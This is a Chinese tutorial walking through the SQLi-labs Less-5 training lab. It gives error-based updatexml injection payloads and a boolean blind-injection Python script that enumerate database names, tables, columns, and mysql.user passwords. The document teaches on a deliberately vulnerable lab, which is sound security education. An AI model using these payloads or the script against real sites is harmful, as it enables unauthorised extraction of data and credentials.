您现在的位置是：首页 > 后端

当前栏目

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

注入报错建议收藏 Less 布尔 Labs 盲注

2023-06-13 09:15:01 时间

大家好，又见面了，我是你们的朋友全栈君。

第五关是单引号字符型注入，推荐使用报错注入、布尔盲注

方式一：报错注入

推荐文章：报错注入使用详解，原理+步骤+实战教程

第一步、判断注入点

地址栏输入：?id=1′

单引号导致，页面显示数据库的报错信息，确定注入点为单引号字符型

第二步、判断报错报错函数是否可用

地址栏输入：?id=0′ and updatexml(1,0x7e,3) — a

页面正常报错，确定报错函数可用。

第三步、脱库

获取所有数据库，地址栏输入：

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(schema_name) 
          from information_schema.schemata)
       )
	,34,31)
,3) -- a

获取 security 库中的所有表，地址栏输入：

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(table_name) 
          from information_schema.tables
          where table_schema="security")
       )
	,1,31)
,3) -- a

获取 users 表中的所有字段，地址栏输入：

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(column_name) 
          from information_schema.columns
          where table_schema="security" and table_name="users")
       )
	,1,31)
,3) -- a

获取数据库的管理员的密码，地址栏输入：

?id=1' and updatexml(1,
	concat(0x7e,(
        select group_concat(user,password) 
        from mysql.user 
        where user = 'mituan')
     ),
3) -- a

方式二：布尔盲注

推荐文章：布尔盲注使用详解，原理+步骤+实战教程

第一步、判断注入点

地址栏输入：?id=1′ and 1 — a，页面正常显示

地址栏输入：?id=1′ and 0 — a，页面异常（空）显示

第二步、判断长度

判断当前所有数据库的长度是否大于2（肯定大于），地址栏输入：

?id=1' and length(
	(select group_concat(schema_name)
    from information_schema.schemata)
) > 2 -- a

页面正常显示，确定payload可用，文末使用脚本自动化判断

第三步、枚举字符

判断所有数据库名的第1个字符的ascll码是否大于1（肯定大于1），地址栏输入：

?id=1' and ascii(
	substr(
		(select group_concat(schema_name)
		from information_schema.schemata)
	,1,1)
) >1 -- a

页面正常显示，确定payload可用，文末使用脚本枚举字符。

第四步、脱库

盲注脚本如下，按照提示修改：

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址（不带参数）
url = "http://70ee4e0d244e4ca5a00526d0f4e48b26.app.mituan.zone/Less-5/"
# 猜解长度使用的payload
payload_len = """?id=1' and length(
	                (select group_concat(user,password)
                    from mysql.user)
                ) = {n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and ascii(
	                substr(
		                (select group_concat(user,password)
		                from mysql.user)
	                ,{n},1)
                ) = {r} -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'You are in...........' in response.text:
            print('测试长度完成，长度为：', length,)
            return length;
        else:
            print('正在测试长度：',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环，截取每一个字符
    for l in range(1, length+1):
        # 第二层循环，枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面中出现此内容则表示成功
            if 'You are in...........' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功：', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

获取所有数据库

判断长度的payload：

?id=1' and length(
	(select group_concat(schema_name)
    from information_schema.schemata)
) ={n} -- a

枚举字符的payload：

?id=1' and ascii(
	substr(
		(select group_concat(schema_name)
		from information_schema.schemata)
	,{n},1)
) ={r} -- a

执行结果：

获取 security 库中的所有表

判断长度的payload：

?id=1' and length(
	(select group_concat(table_name)
    from information_schema.tables
    where table_schema="security")
) ={n} -- a

枚举字符的payload：

?id=1' and ascii(
	substr(
		(select group_concat(table_name)
		from information_schema.tables
        where table_schema="security")
	,{n},1)
) ={r} -- a

执行结果：

获取 users 表的所有字段

判断长度的payload：

?id=1' and length(
	(select group_concat(column_name)
    from information_schema.columns
    where table_schema="security" and table_name="users")
) ={n} -- a

枚举字符的payload：

?id=1' and ascii(
	substr(
		(select group_concat(column_name)
		from information_schema.columns
        where table_schema="security" and table_name="users")
	,{n},1)
) ={r} -- a

执行结果：

推荐专栏

《网络安全快速入门》用最短的时间，掌握最核心的网络安全技术。

《靶场通关教程》各种靶场的通关教程，持续更新……

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/187726.html原文链接：https://javaforall.cn

猜你喜欢

云上的挑战AWS与Oracle的对比（AWS 和oracle）
系统Linux查看64位系统：一步到位（linux查看64位）
ORA-02797: No requests available ORACLE 报错故障修复远程处理
示例：聊天机器人
Java实现循环体的过滤器的方法
优化MySQL服务器参数优化：极致性能提升（mysql服务器参数）
解锁Oracle中的查询结果条数限制（limit中oracle）
MySQL中IF函数的使用与应用了解公司数据处理技巧（mysql中if公司）
MySQL的下载与安装教程（mysql的下载和安装）
探寻Redis存储空间查看数量与大小（查看redis数量大小）
Win32汇编：字符串浮点数运算过程
操作系统体验Linux达芬奇：开启新的操作系统时代（linux达芬奇）
MySQL Error number: MY-012902; Symbol: ER_IB_MSG_1077; SQLSTATE: HY000 报错故障修复远程处理
耗资62.33亿元！格力电器：已累计回购股份1.21亿股
MySql基础-笔记1 -Windows下安装配置图文教程
优化Linux内核性能优化：极致性能无止境（linux内核性能）
PHP输出时间差函数代码
远程控制Linux：强大的远程管理工具（远程linux 工具）

zl程序教程

当前栏目

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

方式一：报错注入

第一步、判断注入点

第二步、判断报错报错函数是否可用

第三步、脱库

方式二：布尔盲注

第一步、判断注入点

第二步、判断长度

第三步、枚举字符

第四步、脱库

推荐专栏

相关文章